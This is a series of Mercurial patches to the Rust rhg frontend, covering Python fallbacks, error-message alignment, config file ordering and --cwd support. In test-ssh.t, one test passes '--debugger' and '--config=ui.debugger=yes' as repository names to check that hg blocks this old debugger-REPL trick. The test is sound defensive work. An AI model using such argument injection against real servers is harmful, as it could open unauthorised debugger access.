6cd9f53aaed8ad1a982185a8c299c45374c3bb58 # Parent 562a676e255a5db7e246daea47bc7d7f3cc8746b rhg: Fall back to Python on --repository with an URL A low-hanging fruit to improve on this would be to properly parse and handle `file:` URLs. But other Python-based hg supports some other URL schemes for features that rhg does not support yet. Differential Revision: https://phab.mercurial-scm.org/D10101 diff --git a/rust/Cargo.lock b/rust/Cargo.lock --- a/rust/Cargo.lock +++ b/rust/Cargo.lock @@ -826,8 +826,10 @@ "env_logger", "format-bytes", "hg-core", + "lazy_static", "log", "micro-timer", + "regex", "users", ] diff --git a/rust/rhg/Cargo.toml b/rust/rhg/Cargo.toml --- a/rust/rhg/Cargo.toml +++ b/rust/rhg/Cargo.toml @@ -12,8 +12,10 @@ chrono = "0.4.19" clap = "2.33.1" derive_more = "0.99" +lazy_static = "1.4.0" log = "0.4.11" micro-timer = "0.3.1" +regex = "1.3.9" env_logger = "0.7.1" format-bytes = "0.2.0" users = "0.11.0" diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -95,6 +95,25 @@ exit(&ui, on_unsupported, Err(error.into())) }); + if let Some(repo_path_bytes) = &early_args.repo { + lazy_static::lazy_static! { + static ref SCHEME_RE: regex::bytes::Regex = + // Same as `_matchscheme` in `mercurial/util.py` + regex::bytes::Regex::new("^[a-zA-Z0-9+.\\-]+:").unwrap(); + } + if SCHEME_RE.is_match(&repo_path_bytes) { + exit( + &ui, + OnUnsupported::from_config(&non_repo_config), + Err(CommandError::UnsupportedFeature { + message: format_bytes!( + b"URL-like --repository {}", + repo_path_bytes + ), + }), + ) + } + } let repo_path = early_args.repo.as_deref().map(get_path_from_bytes); let repo_result = match Repo::find(&non_repo_config, repo_path) { Ok(repo) => Ok(repo), # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614794907 -3600 # Wed Mar 03 19:08:27 2021 +0100 # Node ID dfd35823635b494d1c7e40d13a2a4b736e31a159 # Parent 6cd9f53aaed8ad1a982185a8c299c45374c3bb58 rhg: Fall back to Python for bundle repositories rhg does not support bundles at all, yet. Differential Revision: https://phab.mercurial-scm.org/D10102 diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -61,6 +61,8 @@ let absolute_root = current_dir()?.join(root); if absolute_root.join(".hg").is_dir() { Self::new_at_path(absolute_root, config) + } else if absolute_root.is_file() { + Err(HgError::unsupported("bundle repository").into()) } else { Err(RepoError::NotFound { at: root.to_owned(), # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614797268 -3600 # Wed Mar 03 19:47:48 2021 +0100 # Node ID 3d692e724d068013d0aaf1c0d290c89f2020a409 # Parent dfd35823635b494d1c7e40d13a2a4b736e31a159 rhg: Align config file parse error formatting with Python Differences can cause tests to fail Differential Revision: https://phab.mercurial-scm.org/D10110 diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -9,7 +9,7 @@ use crate::errors::{HgError, IoResultExt}; use crate::utils::files::{get_bytes_from_path, get_path_from_bytes}; -use format_bytes::{write_bytes, DisplayBytes}; +use format_bytes::{format_bytes, write_bytes, DisplayBytes}; use lazy_static::lazy_static; use regex::bytes::Regex; use std::collections::HashMap; @@ -187,10 +187,15 @@ map.remove(&m[1]); } } else { + let message = if bytes.starts_with(b" ") { + format_bytes!(b"unexpected leading whitespace: {}", bytes) + } else { + bytes.to_owned() + }; return Err(ConfigParseError { origin: ConfigOrigin::File(src.to_owned()), line: Some(index + 1), - bytes: bytes.to_owned(), + message, } .into()); } @@ -278,7 +283,7 @@ pub struct ConfigParseError { pub origin: ConfigOrigin, pub line: Option<usize>, - pub bytes: Vec<u8>, + pub message: Vec<u8>, } #[derive(Debug, derive_more::From)] diff --git a/rust/hg-core/src/errors.rs b/rust/hg-core/src/errors.rs --- a/rust/hg-core/src/errors.rs +++ b/rust/hg-core/src/errors.rs @@ -78,10 +78,10 @@ match self { HgError::Abort(explanation) => write!(f, "{}", explanation), HgError::IoError { error, context } => { - write!(f, "{}: {}", error, context) + write!(f, "abort: {}: {}", context, error) } HgError::CorruptedRepository(explanation) => { - write!(f, "corrupted repository: {}", explanation) + write!(f, "abort: corrupted repository: {}", explanation) } HgError::UnsupportedFeature(explanation) => { write!(f, "unsupported feature: {}", explanation) @@ -128,8 +128,12 @@ from.display(), to.display() ), - IoErrorContext::CurrentDir => write!(f, "current directory"), - IoErrorContext::CurrentExe => write!(f, "current executable"), + IoErrorContext::CurrentDir => { + write!(f, "error getting current working directory") + } + IoErrorContext::CurrentExe => { + write!(f, "error getting current executable") + } } } } diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -87,7 +87,7 @@ let NoRepoInCwdError { cwd } = error; CommandError::Abort { message: format_bytes!( - b"no repository found in '{}' (.hg not found)!", + b"abort: no repository found in '{}' (.hg not found)!", get_bytes_from_path(cwd) ), } @@ -108,19 +108,19 @@ let ConfigParseError { origin, line, - bytes, + message, } = error; let line_message = if let Some(line_number) = line { - format_bytes!(b" at line {}", line_number.to_string().into_bytes()) + format_bytes!(b":{}", line_number.to_string().into_bytes()) } else { Vec::new() }; CommandError::Abort { message: format_bytes!( - b"config parse error in {}{}: '{}'", + b"config error at {}{}: {}", origin, line_message, - bytes + message ), } } @@ -130,11 +130,11 @@ fn from((err, rev): (RevlogError, &str)) -> CommandError { match err { RevlogError::InvalidRevision => CommandError::abort(format!( - "invalid revision identifier {}", + "abort: invalid revision identifier: {}", rev )), RevlogError::AmbiguousPrefix => CommandError::abort(format!( - "ambiguous revision identifier {}", + "abort: ambiguous revision identifier: {}", rev )), RevlogError::Other(error) => error.into(), diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -201,8 +201,7 @@ if !message.is_empty() { // Ignore errors when writing to stderr, we’re already exiting // with failure code so there’s not much more we can do. - let _ = - ui.write_stderr(&format_bytes!(b"abort: {}\n", message)); + let _ = ui.write_stderr(&format_bytes!(b"{}\n", message)); } } Err(CommandError::UnsupportedFeature { message }) => { diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -45,7 +45,7 @@ Deleted repository $ rm -rf `pwd` $ $NO_FALLBACK rhg root - abort: $ENOENT$: current directory + abort: error getting current working directory: $ENOENT$ [255] Listing tracked files @@ -122,7 +122,7 @@ $ $NO_FALLBACK rhg cat -r cf8b83 file-2 2 $ $NO_FALLBACK rhg cat -r c file-2 - abort: ambiguous revision identifier c + abort: ambiguous revision identifier: c [255] $ $NO_FALLBACK rhg cat -r d file-2 2 # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614798127 -3600 # Wed Mar 03 20:02:07 2021 +0100 # Node ID 60fe9ebae29bc89646a50d7ef458fbe04f93e161 # Parent 3d692e724d068013d0aaf1c0d290c89f2020a409 rhg: Sort config files when adding a directory For example in `/etc/mercurial/hgrc.d/` or with `HGRCPATH=some-directory`. Previously files where parsed in the order returned by the filesystem, which is undefined. But order is significant when multiple files define the same configuration key: the "last" one wins. Differential Revision: https://phab.mercurial-scm.org/D10111 diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -125,8 +125,13 @@ .when_reading_file(path) .io_not_found_as_none()? { - for entry in entries { - let file_path = entry.when_reading_file(path)?.path(); + let mut file_paths = entries + .map(|result| { + result.when_reading_file(path).map(|entry| entry.path()) + }) + .collect::<Result<Vec<_>, _>>()?; + file_paths.sort(); + for file_path in &file_paths { if file_path.extension() == Some(std::ffi::OsStr::new("rc")) { self.add_trusted_file(&file_path)? } # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614851923 -3600 # Thu Mar 04 10:58:43 2021 +0100 # Node ID 1bac7764ceef562b66801c0d5a19d3b0f50cb940 # Parent 60fe9ebae29bc89646a50d7ef458fbe04f93e161 rhg: Fall back to Python if unsupported extensions are enabled Extensions might affect behavior in ways we can’t anticipate, so just ignoring them is not correct. Later we’ll add opt-in configuration to ignore specific extensions. Differential Revision: https://phab.mercurial-scm.org/D10112 diff --git a/rust/Cargo.lock b/rust/Cargo.lock --- a/rust/Cargo.lock +++ b/rust/Cargo.lock @@ -286,9 +286,9 @@ [[package]] name = "format-bytes" -version = "0.2.0" +version = "0.2.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cc35f5e45d6b31053cea13078ffc6fa52fa8617aa54b7ac2011720d9c009e04f" +checksum = "8030ff4b04f0ca1c612d6fe49f2fc18caf56fb01497cb370b41cfd36d89b3b06" dependencies = [ "format-bytes-macros", "proc-macro-hack", diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -14,6 +14,7 @@ }; use crate::utils::files::get_bytes_from_os_str; use format_bytes::{write_bytes, DisplayBytes}; +use std::collections::HashSet; use std::env; use std::path::{Path, PathBuf}; use std::str; @@ -361,6 +362,14 @@ None } + /// Return all keys defined for the given section + pub fn get_section_keys(&self, section: &[u8]) -> HashSet<&[u8]> { + self.layers + .iter() + .flat_map(|layer| layer.iter_keys(section)) + .collect() + } + /// Get raw values bytes from all layers (even untrusted ones) in order /// of precedence. #[cfg(test)] diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -115,6 +115,14 @@ Some(self.sections.get(section)?.get(item)?) } + /// Returns the keys defined in the given section + pub fn iter_keys(&self, section: &[u8]) -> impl Iterator<Item = &[u8]> { + self.sections + .get(section) + .into_iter() + .flat_map(|section| section.keys().map(|vec| &**vec)) + } + pub fn is_empty(&self) -> bool { self.sections.is_empty() } diff --git a/rust/rhg/Cargo.toml b/rust/rhg/Cargo.toml --- a/rust/rhg/Cargo.toml +++ b/rust/rhg/Cargo.toml @@ -17,5 +17,5 @@ micro-timer = "0.3.1" regex = "1.3.9" env_logger = "0.7.1" -format-bytes = "0.2.0" +format-bytes = "0.2.1" users = "0.11.0" diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -4,7 +4,7 @@ use clap::AppSettings; use clap::Arg; use clap::ArgMatches; -use format_bytes::format_bytes; +use format_bytes::{format_bytes, join}; use hg::config::Config; use hg::repo::{Repo, RepoError}; use hg::utils::files::{get_bytes_from_os_str, get_path_from_bytes}; @@ -25,6 +25,8 @@ repo: Result<&Repo, &NoRepoInCwdError>, config: &Config, ) -> Result<(), CommandError> { + check_extensions(config)?; + let app = App::new("rhg") .global_setting(AppSettings::AllowInvalidUtf8) .setting(AppSettings::SubcommandRequired) @@ -352,3 +354,25 @@ } } } + +const SUPPORTED_EXTENSIONS: &[&[u8]] = &[b"blackbox", b"share"]; + +fn check_extensions(config: &Config) -> Result<(), CommandError> { + let enabled = config.get_section_keys(b"extensions"); + + let mut unsupported = enabled; + for supported in SUPPORTED_EXTENSIONS { + unsupported.remove(supported); + } + + if unsupported.is_empty() { + Ok(()) + } else { + Err(CommandError::UnsupportedFeature { + message: format_bytes!( + b"extensions: {}", + join(unsupported, b", ") + ), + }) + } +} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1615585120 -3600 # Fri Mar 12 22:38:40 2021 +0100 # Node ID 1a036d33bc1896d86c6bdb2b3bd832fff3cfd8bf # Parent 1bac7764ceef562b66801c0d5a19d3b0f50cb940 rhg: Add an allow-list of ignored extensions Because rhg doesn’t know how a Python extension would affect behavior it implements in Rust, when an unsupported extension is enabled it conservatively falls back to Python-based hg. However many users will have unsupported extensions enabled in practice. Maybe they don’t actually affect rhg behavior, but we don’t know. This adds a `rhg.ignored-extensions` configuration that lets users list extensions that rhg can safely ignore and proceed even if they’re not supported in Rust. Differential Revision: https://phab.mercurial-scm.org/D10188 diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -13,6 +13,7 @@ ConfigError, ConfigLayer, ConfigOrigin, ConfigValue, }; use crate::utils::files::get_bytes_from_os_str; +use crate::utils::SliceExt; use format_bytes::{write_bytes, DisplayBytes}; use std::collections::HashSet; use std::env; @@ -339,6 +340,31 @@ Ok(self.get_option(section, item)?.unwrap_or(false)) } + /// Returns the corresponding list-value in the config if found, or `None`. + /// + /// This is appropriate for new configuration keys. The value syntax is + /// **not** the same as most existing list-valued config, which has Python + /// parsing implemented in `parselist()` in `mercurial/config.py`. + /// Faithfully porting that parsing algorithm to Rust (including behavior + /// that are arguably bugs) turned out to be non-trivial and hasn’t been + /// completed as of this writing. + /// + /// Instead, the "simple" syntax is: split on comma, then trim leading and + /// trailing whitespace of each component. Quotes or backslashes are not + /// interpreted in any way. Commas are mandatory between values. Values + /// that contain a comma are not supported. + pub fn get_simple_list( + &self, + section: &[u8], + item: &[u8], + ) -> Option<impl Iterator<Item = &[u8]>> { + self.get(section, item).map(|value| { + value + .split(|&byte| byte == b',') + .map(|component| component.trim()) + }) + } + /// Returns the raw value bytes of the first one found, or `None`. pub fn get(&self, section: &[u8], item: &[u8]) -> Option<&[u8]> { self.get_inner(section, item) diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -365,12 +365,20 @@ unsupported.remove(supported); } + if let Some(ignored_list) = + config.get_simple_list(b"rhg", b"ignored-extensions") + { + for ignored in ignored_list { + unsupported.remove(ignored); + } + } + if unsupported.is_empty() { Ok(()) } else { Err(CommandError::UnsupportedFeature { message: format_bytes!( - b"extensions: {}", + b"extensions: {} (consider adding them to 'rhg.ignored-extensions' config)", join(unsupported, b", ") ), }) # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614861020 -3600 # Thu Mar 04 13:30:20 2021 +0100 # Node ID 12d59eec7f1d50b5b1313de36e15689733a47ddb # Parent 1a036d33bc1896d86c6bdb2b3bd832fff3cfd8bf rhg: Align with Python on some more error messages Differences can cause some tests to fail Differential Revision: https://phab.mercurial-scm.org/D10133 diff --git a/rust/Cargo.lock b/rust/Cargo.lock --- a/rust/Cargo.lock +++ b/rust/Cargo.lock @@ -286,9 +286,9 @@ [[package]] name = "format-bytes" -version = "0.2.1" +version = "0.2.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8030ff4b04f0ca1c612d6fe49f2fc18caf56fb01497cb370b41cfd36d89b3b06" +checksum = "1c4e89040c7fd7b4e6ba2820ac705a45def8a0c098ec78d170ae88f1ef1d5762" dependencies = [ "format-bytes-macros", "proc-macro-hack", diff --git a/rust/hg-core/Cargo.toml b/rust/hg-core/Cargo.toml --- a/rust/hg-core/Cargo.toml +++ b/rust/hg-core/Cargo.toml @@ -28,7 +28,7 @@ memmap = "0.7.0" zstd = "0.5.3" rust-crypto = "0.2.36" -format-bytes = "0.2.0" +format-bytes = "0.2.2" # We don't use the `miniz-oxide` backend to not change rhg benchmarks and until # we have a clearer view of which backend is the fastest. diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -7,7 +7,7 @@ // This software may be used and distributed according to the terms of the // GNU General Public License version 2 or any later version. -use crate::errors::{HgError, IoResultExt}; +use crate::errors::HgError; use crate::utils::files::{get_bytes_from_path, get_path_from_bytes}; use format_bytes::{format_bytes, write_bytes, DisplayBytes}; use lazy_static::lazy_static; @@ -74,7 +74,7 @@ layer.add(section, item, value, None); } else { Err(HgError::abort(format!( - "malformed --config option: '{}' \ + "abort: malformed --config option: '{}' \ (use --config section.name=value)", String::from_utf8_lossy(arg), )))? @@ -147,6 +147,7 @@ let mut section = b"".to_vec(); while let Some((index, bytes)) = lines_iter.next() { + let line = Some(index + 1); if let Some(m) = INCLUDE_RE.captures(&bytes) { let filename_bytes = &m[1]; // `Path::parent` only fails for the root directory, @@ -158,8 +159,17 @@ // `Path::join` with an absolute argument correctly ignores the // base path let filename = dir.join(&get_path_from_bytes(&filename_bytes)); - let data = - std::fs::read(&filename).when_reading_file(&filename)?; + let data = std::fs::read(&filename).map_err(|io_error| { + ConfigParseError { + origin: ConfigOrigin::File(src.to_owned()), + line, + message: format_bytes!( + b"cannot include {} ({})", + filename_bytes, + format_bytes::Utf8(io_error) + ), + } + })?; layers.push(current_layer); layers.extend(Self::parse(&filename, &data)?); current_layer = Self::new(ConfigOrigin::File(src.to_owned())); @@ -184,12 +194,7 @@ }; lines_iter.next(); } - current_layer.add( - section.clone(), - item, - value, - Some(index + 1), - ); + current_layer.add(section.clone(), item, value, line); } else if let Some(m) = UNSET_RE.captures(&bytes) { if let Some(map) = current_layer.sections.get_mut(§ion) { map.remove(&m[1]); @@ -202,7 +207,7 @@ }; return Err(ConfigParseError { origin: ConfigOrigin::File(src.to_owned()), - line: Some(index + 1), + line, message, } .into()); diff --git a/rust/hg-core/src/errors.rs b/rust/hg-core/src/errors.rs --- a/rust/hg-core/src/errors.rs +++ b/rust/hg-core/src/errors.rs @@ -81,7 +81,7 @@ write!(f, "abort: {}: {}", context, error) } HgError::CorruptedRepository(explanation) => { - write!(f, "abort: corrupted repository: {}", explanation) + write!(f, "abort: {}", explanation) } HgError::UnsupportedFeature(explanation) => { write!(f, "unsupported feature: {}", explanation) diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -141,20 +141,22 @@ if share_safe && !source_is_share_safe { return Err(match config - .get(b"safe-mismatch", b"source-not-safe") + .get(b"share", b"safe-mismatch.source-not-safe") { Some(b"abort") | None => HgError::abort( - "share source does not support share-safe requirement", + "abort: share source does not support share-safe requirement\n\ + (see `hg help config.format.use-share-safe` for more information)", ), _ => HgError::unsupported("share-safe downgrade"), } .into()); } else if source_is_share_safe && !share_safe { return Err( - match config.get(b"safe-mismatch", b"source-safe") { + match config.get(b"share", b"safe-mismatch.source-safe") { Some(b"abort") | None => HgError::abort( - "version mismatch: source uses share-safe \ - functionality while the current share does not", + "abort: version mismatch: source uses share-safe \ + functionality while the current share does not\n\ + (see `hg help config.format.use-share-safe` for more information)", ), _ => HgError::unsupported("share-safe upgrade"), } diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -72,7 +72,7 @@ match error { RepoError::NotFound { at } => CommandError::Abort { message: format_bytes!( - b"repository {} not found", + b"abort: repository {} not found", get_bytes_from_path(at) ), }, diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -187,7 +187,7 @@ $ echo -e '\xFF' >> .hg/requires $ $NO_FALLBACK rhg debugrequirements - abort: corrupted repository: parse error in 'requires' file + abort: parse error in 'requires' file [255] Persistent nodemap # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614939675 -3600 # Fri Mar 05 11:21:15 2021 +0100 # Node ID 2255e7eb39e5ad8f0b538bff53ec04cec00c366b # Parent 12d59eec7f1d50b5b1313de36e15689733a47ddb rhg: Add support for --cwd This affect the meaning of relative paths in `--repository`, which are resolved "early" by rhg in order to load config which is needed before fallback to Python is considered. An incorrect path could cause errors when loading a non-existent repo, leading to failing tests even when fallback is enabled. Differential Revision: https://phab.mercurial-scm.org/D10134 diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -53,6 +53,14 @@ // Not ok: `--config section.key1=val section.key2=val2` .number_of_values(1), ) + .arg( + Arg::with_name("cwd") + .help("change working directory") + .long("--cwd") + .value_name("DIR") + .takes_value(true) + .global(true), + ) .version("0.0.1"); let app = add_subcommand_args(app); @@ -87,6 +95,28 @@ let ui = ui::Ui::new(); let early_args = EarlyArgs::parse(std::env::args_os()); + + let initial_current_dir = early_args.cwd.map(|cwd| { + let cwd = get_path_from_bytes(&cwd); + std::env::current_dir() + .and_then(|initial| { + std::env::set_current_dir(cwd)?; + Ok(initial) + }) + .unwrap_or_else(|error| { + exit( + &None, + &ui, + OnUnsupported::Abort, + Err(CommandError::abort(format!( + "abort: {}: '{}'", + error, + cwd.display() + ))), + ) + }) + }); + let non_repo_config = Config::load(early_args.config).unwrap_or_else(|error| { // Normally this is decided based on config, but we don’t have that @@ -94,7 +124,7 @@ // "unsupported" error but that is not enforced by the type system. let on_unsupported = OnUnsupported::Abort; - exit(&ui, on_unsupported, Err(error.into())) + exit(&initial_current_dir, &ui, on_unsupported, Err(error.into())) }); if let Some(repo_path_bytes) = &early_args.repo { @@ -105,6 +135,7 @@ } if SCHEME_RE.is_match(&repo_path_bytes) { exit( + &initial_current_dir, &ui, OnUnsupported::from_config(&non_repo_config), Err(CommandError::UnsupportedFeature { @@ -124,6 +155,7 @@ Err(NoRepoInCwdError { cwd: at }) } Err(error) => exit( + &initial_current_dir, &ui, OnUnsupported::from_config(&non_repo_config), Err(error.into()), @@ -142,7 +174,12 @@ repo_result.as_ref(), config, ); - exit(&ui, OnUnsupported::from_config(config), result) + exit( + &initial_current_dir, + &ui, + OnUnsupported::from_config(config), + result, + ) } fn exit_code(result: &Result<(), CommandError>) -> i32 { @@ -159,6 +196,7 @@ } fn exit( + initial_current_dir: &Option<PathBuf>, ui: &Ui, mut on_unsupported: OnUnsupported, result: Result<(), CommandError>, @@ -182,7 +220,12 @@ on_unsupported = OnUnsupported::Abort } else { // `args` is now `argv[1..]` since we’ve already consumed `argv[0]` - let result = Command::new(executable_path).args(args).status(); + let mut command = Command::new(executable_path); + command.args(args); + if let Some(initial) = initial_current_dir { + command.current_dir(initial); + } + let result = command.status(); match result { Ok(status) => std::process::exit( status.code().unwrap_or(exitcode::ABORT), @@ -283,6 +326,8 @@ config: Vec<Vec<u8>>, /// Value of the `-R` or `--repository` argument, if any. repo: Option<Vec<u8>>, + /// Value of the `--cwd` argument, if any. + cwd: Option<Vec<u8>>, } impl EarlyArgs { @@ -290,6 +335,7 @@ let mut args = args.into_iter().map(get_bytes_from_os_str); let mut config = Vec::new(); let mut repo = None; + let mut cwd = None; // Use `while let` instead of `for` so that we can also call // `args.next()` inside the loop. while let Some(arg) = args.next() { @@ -301,6 +347,14 @@ config.push(value.to_owned()) } + if arg == b"--cwd" { + if let Some(value) = args.next() { + cwd = Some(value) + } + } else if let Some(value) = arg.drop_prefix(b"--cwd=") { + cwd = Some(value.to_owned()) + } + if arg == b"--repository" || arg == b"-R" { if let Some(value) = args.next() { repo = Some(value) @@ -311,7 +365,7 @@ repo = Some(value.to_owned()) } } - Self { config, repo } + Self { config, repo, cwd } } } # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614940761 -3600 # Fri Mar 05 11:39:21 2021 +0100 # Node ID e96a0a53de20700beacccb656617bceab78f639e # Parent 2255e7eb39e5ad8f0b538bff53ec04cec00c366b tests: Adapt expected output for minor differences with rhg Differential Revision: https://phab.mercurial-scm.org/D10135 diff --git a/tests/test-globalopts.t b/tests/test-globalopts.t --- a/tests/test-globalopts.t +++ b/tests/test-globalopts.t @@ -264,7 +264,7 @@ Testing --traceback: -#if no-chg +#if no-chg no-rhg $ hg --cwd c --config x --traceback id 2>&1 | grep -i 'traceback' Traceback (most recent call last): Traceback (most recent call last): (py3 !) diff --git a/tests/test-hgrc.t b/tests/test-hgrc.t --- a/tests/test-hgrc.t +++ b/tests/test-hgrc.t @@ -59,7 +59,7 @@ #if unix-permissions no-root $ chmod u-r $TESTTMP/included $ hg showconfig section - config error at $TESTTMP/hgrc:2: cannot include $TESTTMP/included (Permission denied) + config error at $TESTTMP/hgrc:2: cannot include $TESTTMP/included (Permission denied*) (glob) [255] #endif diff --git a/tests/test-ssh.t b/tests/test-ssh.t --- a/tests/test-ssh.t +++ b/tests/test-ssh.t @@ -390,6 +390,7 @@ abort: destination 'a repo' is not empty [10] +#if no-rhg Make sure hg is really paranoid in serve --stdio mode. It used to be possible to get a debugger REPL by specifying a repo named --debugger. $ hg -R --debugger serve --stdio @@ -402,6 +403,27 @@ $ hg -R narf serv --stdio abort: potentially unsafe serve --stdio invocation: ['-R', 'narf', 'serv', '--stdio'] [255] +#else +rhg aborts early on -R without a repository at that path + $ hg -R --debugger serve --stdio + abort: potentially unsafe serve --stdio invocation: ['-R', '--debugger', 'serve', '--stdio'] (missing-correct-output !) + abort: repository --debugger not found (known-bad-output !) + [255] + $ hg -R --config=ui.debugger=yes serve --stdio + abort: potentially unsafe serve --stdio invocation: ['-R', '--config=ui.debugger=yes', 'serve', '--stdio'] (missing-correct-output !) + abort: repository --config=ui.debugger=yes not found (known-bad-output !) + [255] + $ hg -R narf serv --stdio + abort: potentially unsafe serve --stdio invocation: ['-R', 'narf', 'serv', '--stdio'] (missing-correct-output !) + abort: repository narf not found (known-bad-output !) + [255] +If the repo does exist, rhg finds an unsupported command and falls back to Python +which still does the right thing + $ hg init narf + $ hg -R narf serv --stdio + abort: potentially unsafe serve --stdio invocation: ['-R', 'narf', 'serv', '--stdio'] + [255] +#endif Test hg-ssh using a helper script that will restore PYTHONPATH (which might have been cleared by a hg.exe wrapper) and invoke hg-ssh with the right # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615221142 -3600 # Mon Mar 08 17:32:22 2021 +0100 # Node ID b4ad45f2f648d0e85b6b59987d5972d233b79eb4 # Parent e96a0a53de20700beacccb656617bceab78f639e tests: clarify some missing output in test-merge-subrepos This makes the test behavior clearer, especially, why the output are inconsistent. Differential Revision: https://phab.mercurial-scm.org/D10136 diff --git a/tests/test-merge-subrepos.t b/tests/test-merge-subrepos.t --- a/tests/test-merge-subrepos.t +++ b/tests/test-merge-subrepos.t @@ -117,10 +117,17 @@ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved XXX: There's a difference between wdir() and '.', so there should be a status. -`hg files -S` from the top is also missing 'subrepo/b'. +`hg files -S` from the top is also missing 'subrepo/b'. The files should be +seen as deleted (and, maybe even missing? in which case `hg files` should list +it) $ hg st -S + R subrepo/b (missing-correct-output !) $ hg st -R subrepo + R subrepo/b (missing-correct-output !) + +(note: return [1] because no files "match" since the list is empty) + $ hg files -R subrepo [1] $ hg files -R subrepo -r '.' # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614947329 -3600 # Fri Mar 05 13:28:49 2021 +0100 # Node ID c184b490da37d76b61852b77513964301df4fc8b # Parent b4ad45f2f648d0e85b6b59987d5972d233b79eb4 rhg: Fall back to Python if ui.relative-paths is configured This feature is not supported yet, and affects the output of some tests. Differential Revision: https://phab.mercurial-scm.org/D10137 diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -27,6 +27,13 @@ } pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let relative = invocation.config.get(b"ui", b"relative-paths"); + if relative.is_some() { + return Err(CommandError::unsupported( + "non-default ui.relative-paths", + )); + } + let rev = invocation.subcommand_args.value_of("rev"); let repo = invocation.repo?; # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1615188943 -3600 # Mon Mar 08 08:35:43 2021 +0100 # Node ID 97ac588b6d9e146feb133b9588078d19a606dcdf # Parent c184b490da37d76b61852b77513964301df4fc8b rhg: Don’t make repository path absolute too early Some error messages want to include a relative path, which affects the output of some tests. Differential Revision: https://phab.mercurial-scm.org/D10138 diff --git a/rust/hg-core/src/errors.rs b/rust/hg-core/src/errors.rs --- a/rust/hg-core/src/errors.rs +++ b/rust/hg-core/src/errors.rs @@ -50,6 +50,8 @@ from: std::path::PathBuf, to: std::path::PathBuf, }, + /// `std::fs::canonicalize` + CanonicalizingPath(std::path::PathBuf), /// `std::env::current_dir` CurrentDir, /// `std::env::current_exe` @@ -128,6 +130,9 @@ from.display(), to.display() ), + IoErrorContext::CanonicalizingPath(path) => { + write!(f, "when canonicalizing {}", path.display()) + } IoErrorContext::CurrentDir => { write!(f, "error getting current working directory") } diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -2,7 +2,7 @@ use crate::errors::{HgError, IoErrorContext, IoResultExt}; use crate::requirements; use crate::utils::files::get_path_from_bytes; -use crate::utils::{current_dir, SliceExt}; +use crate::utils::SliceExt; use memmap::{Mmap, MmapOptions}; use std::collections::HashSet; use std::path::{Path, PathBuf}; @@ -56,12 +56,9 @@ explicit_path: Option<&Path>, ) -> Result<Self, RepoError> { if let Some(root) = explicit_path { - // Having an absolute path isn’t necessary here but can help code - // elsewhere - let absolute_root = current_dir()?.join(root); - if absolute_root.join(".hg").is_dir() { - Self::new_at_path(absolute_root, config) - } else if absolute_root.is_file() { + if root.join(".hg").is_dir() { + Self::new_at_path(root.to_owned(), config) + } else if root.is_file() { Err(HgError::unsupported("bundle repository").into()) } else { Err(RepoError::NotFound { diff --git a/rust/rhg/src/commands/cat.rs b/rust/rhg/src/commands/cat.rs --- 